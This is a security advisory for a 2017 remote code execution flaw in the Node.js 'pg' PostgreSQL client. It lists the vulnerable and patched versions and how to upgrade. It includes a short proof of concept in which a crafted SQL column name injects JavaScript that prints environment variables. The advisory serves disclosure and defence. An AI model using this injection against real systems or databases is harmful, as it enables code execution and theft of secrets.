Remote Code Execution

Module: pg

Published: August 13th, 2017

Reported by: Sehrope Sarkuni

CVE-NONE

CWE-

Vulnerable: < 2.11.2 || >= 3.0.0 < 3.6.4 || >= 4.0.0 < 4.5.7 || >= 5.0.0 < 5.2.1 || >= 6.0.0 < 6.0.5 || >= 6.1.0 < 6.1.6 || >= 6.2.0 < 6.2.5 || >= 6.3.0 < 6.3.3 || >= 6.4.0 < 6.4.2 || >= 7.0.0 < 7.0.2 || >= 7.1.0 < 7.1.2
Patched: >= 2.11.2 < 3.0.0|| >= 3.6.4 < 4.0.0 || >= 4.5.7 < 5.0.0 || >= 5.2.1 < 6.0.0 || >= 6.0.5 < 6.1.0 || >= 6.1.6 < 6.2.0 || >= 6.2.5 < 6.3.0 || >= 6.3.3 < 6.4.0 || >= 6.4.2 < 7.0.0 || >= 7.0.2 < 7.1.0 || >= 7.1.2

Overview

A remote code execution vulnerability was found within the pg module when the remote database or query specifies a specially crafted column name.

The announcement from node-postgres describes two scenarios in which you are likely to be vulnerable:

  1. You are executing unsafe, user-supplied SQL which contains a malicious column name like the one in the proof of concept below.
  2. You are connecting to an untrusted database and executing a query which returns results where any of the column names are malicious.

Proof of concept

const { Client } = require('pg')
const client = new Client()
client.connect()

const sql = `SELECT 1 AS "\\'/*", 2 AS "\\'*/\n + console.log(process.env)] = null;\n//"`

client.query(sql, (err, res) => {
  client.end()
})

Remediation

Upgrade to one of the patched versions listed below (the first fixed release on each supported line).

  • pg@2.11.2
  • pg@3.6.4
  • pg@4.5.7
  • pg@5.2.1
  • pg@6.0.5
  • pg@6.1.6
  • pg@6.2.5
  • pg@6.3.3
  • pg@6.4.2
  • pg@7.0.2
  • pg@7.1.2
